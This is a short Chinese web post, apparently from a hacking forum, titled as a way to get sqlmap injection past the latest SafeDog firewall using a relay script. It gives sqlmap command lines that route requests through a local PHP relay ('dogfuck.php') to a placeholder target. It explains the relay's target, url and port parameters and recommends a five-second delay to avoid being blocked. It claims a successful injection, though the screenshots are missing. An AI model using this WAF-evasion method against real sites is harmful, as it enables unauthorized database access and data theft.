sqlmap注入过最新安全狗-中转脚本

previous page next page
先证明下:
 
使用后效果:


搭建php环境取得本文件地址为:http://www.a.com/dog/dogfuck.php (www.a.com 修改的本地host文件,与localhost 意义一样,也可以上传到自己web服务器)

与平时使用sqlmap注入不同的是 -u参数
  1. 平时:sqlmap.py -u "http://www.xxxx.com/3.php" --data "buff=1&sub=ok" --delay 5 -p "buff"  --dbs
  2. 现在:sqlmap.py -u "http://www.a.com/dog/dogfuck.php?target=www.xxxx.com&url=/3.php&port=80" --data "buff=1&sub=ok" --delay 5 -p "buff"  --dbs   

  4. 3个参数:target-目标域名  url-域名下的具体路径 port-端口
  5. http://www.a.com/dog/dogfuck.php?target=www.xxxx.com&url=/3.php&port=80
  6. 注入的时候记得使用--delay 延时5秒左右,频率过快安全狗一样会拦截。
以下为测试截图:
 
然后在猜解表的字段数了:
 

然后注入成功:


看一下服务器狗:

previous page start next page